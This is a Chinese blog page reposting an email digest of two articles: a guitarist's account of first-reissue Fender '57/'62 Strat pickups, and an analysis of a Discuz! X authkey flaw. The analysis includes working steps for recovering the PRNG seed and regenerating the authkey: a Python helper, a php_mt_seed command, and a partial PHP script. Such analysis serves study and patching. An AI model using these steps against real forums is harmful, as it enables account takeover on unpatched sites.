搜索此博客

2017年9月1日星期五

首版复刻的Fender '57 & '62 Strat 拾音器

本邮件内容由第三方提供,如果您不想继续收到该邮件,可 点此退订
首版复刻的Fender '57 & '62 Strat 拾音器  阅读原文»

去年10月份左右从咸鱼买了一把号称93年产原装无修改的Fender vintage 57 stratocaster,拆开看了一下,琴颈的生产日期是1993.05.21,还挺有纪念意义的。但就在我买了新拾音器准备改装它的时候,好像发现了一个天大的秘密。

按理说57/62拾音器相对别的Custom Shop拾音器是比较便宜的,特征是直流电阻5.6K Ohm,六根磁柱都有倒角,黄铜线圈(具体的可以查看fender官网介绍。可是我刚拆开拾音器就看到了里面的紫铜线圈,我的第一反应是琴的原主人给换了Texas Special Pickup,这可赚大了,可经我查完资料以后发现这不是 Texas Special,而是首版复刻的57/62

网上的两篇介绍《Fender '57 & '62 Strat Pickup (First Reissue)》《Poll About the F '57/'62 099-2117-000 s

―�Cpre-1998 version of the Fender USA Vintage Stratocaster '57 & '62 reissue pickup―�C

拾音器的细节是紫铜线圈 电阻6.5K 6.2K 6.5K 磁钢没有倒角。除了背面没有红/蓝点,导线都是白/黑(Texas的琴桥为黄/黑)以外,外观跟 Texas Special 一模一样。

Fender 在1992年前的复刻(vintage reissue)吉他中只有这个拾音器,代号为99-2043-000,之后Fender为了复制SRV的声音,以及制作签名款SRV吉他,才开始生产Texas Special拾音器。1998年以后57/62才开始用现在的拾音器099-2117-000(特征是塑料线/有倒角/黄铜线圈/电阻5.6k)

―�C我的93年复刻Vintage 57―�C

这把57除了拾音器不同以外,电容也很独特0.1uf(刚换上新拾音器的时候声音闷的不行,直到我第二次拆开后发现电容那么大)。之前的pre-1998 57/62拾音器加上0.1的电容声音又大又亮(功率介于dimarzio HS-2/3/4Gibson P90拾音器之间),可见如果换成正常的0.022uf电容功率得多大>_<

我新换的拾音器是我在网上淘到的停产的Lace Sensor Gold domes拾音器(现在只有银色的Crome Domes了,我问了原因,他们给的回复是 The Gold Dome pickups were simple Chrome Domes with a gold cover. They were produced sometime during the mid-2000's, but for only a short while. The proved to be difficult to build and not cost effective. Sonically, there was no difference from the Chrome Dome pickups.),如果有机会的话,我还是准备把那个牛逼的拾音器换回去。


黑客技术官网地址:http://www.hackdig.com/

Discuz_X authkey安全性漏洞分析  阅读原文»

2017年8月1日,Discuz!发布了X3.4版本,此次更新中修复了authkey生成算法的安全性漏洞,通过authkey安全性漏洞,我们可以获得authkey。系统中逻辑大量使用authkey以及authcode算法,通过该漏洞可导致一系列安全问题:邮箱校验的hash参数被破解,导致任意用户绑定邮箱可被修改等…
2017年8月22日,360cert团队发布了对该补丁的分析,我们对整个漏洞进行了进一步分析,对漏洞的部分利用方式进行了探究。

漏洞详情

2017年8月1日,Discuz!发布了X3.4版本,此次更新中修复了authkey生成算法的安全性漏洞,通过authkey安全性漏洞,我们可以获得authkey。系统中逻辑大量使用authkey以及authcode算法,通过该漏洞可导致一系列安全问题:邮箱校验的hash参数被破解,导致任意用户绑定邮箱可被修改等...  2017年8月22日,360cert团队发布了对该补丁的分析,我们对整个漏洞进行了进一步分析,对漏洞的部分利用方式进行了探究。

漏洞影响版本:

  • Discuz_X3.3_SC_GBK
  • Discuz_X3.3_SC_UTF8
  • Discuz_X3.3_TC_BIG5
  • Discuz_X3.3_TC_UTF8
  • Discuz_X3.2_SC_GBK
  • Discuz_X3.2_SC_UTF8
  • Discuz_X3.2_TC_BIG5
  • Discuz_X3.2_TC_UTF8
  • Discuz_X2.5_SC_GBK
  • Discuz_X2.5_SC_UTF8
  • Discuz_X2.5_TC_BIG5
  • Discuz_X2.5_TC_UTF8

漏洞在Discuz_X3.4中被修复

漏洞分析

在dz3.3/upload/install/index.php 346行
image.png-184.7kB

我们看到authkey是由多个参数的md5前6位加上random生成的10位产生的。

跟入random函数
image.png-115.2kB

当php版本大于4.2.0时,随机数种子不会改变

我们可以看到在生成authkey之后,使用random函数生成了4位cookie前缀

1
$_config['cookie']['cookiepre'] = random(4).'_';

那么这4位cookie前缀就是我们可以得到的,那我们就可以使用字符集加上4位已知字符,爆破随机数种子。

首先我们需要先获得4位字符
image.png-193.7kB

sW7c

然后通过脚本生成用于php_mt_seed的参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# coding=utf-8
w_len = 10
result = ""
str_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
length = len(str_list)
for i in xrange(w_len):
	result+="0 "
	result+=str(length-1)
	result+=" "
	result+="0 "
	result+=str(length-1)
	result+=" "
sstr = "sW7c"
for i in sstr:
	result+=str(str_list.index(i))
	result+=" "
	result+=str(str_list.index(i))
	result+=" "
	result+="0 "
	result+=str(length-1)
	result+=" "
print result

得到参数,使用php_mt_seed脚本

1
./php_mt_seed 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 0 61 54 54 0 61 22 22 0 61 33 33 0 61 38 38 0 61 > result.txt

这里我获得了245组种子

接下来我们需要使用这245组随机数种子生成随机字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
function random($length) {
	$hash = '';
	$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
	$max = strlen($chars) - 1;
	PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
	for($i = 0; $i < $length; $i++) {
		$hash .= $chars[mt_rand(0, $max)];
	}
	return $hash;
}
$fp = fopen('result.txt', 'rb');
$fp2 = fopen('result2.txt', 'wb');
while(!feof($fp)){
	$b = fgets($fp, 
阅读更多内容
    
  








发帖者



时间:










































没有评论:











发表评论






        
      








订阅:
博文评论 (Atom)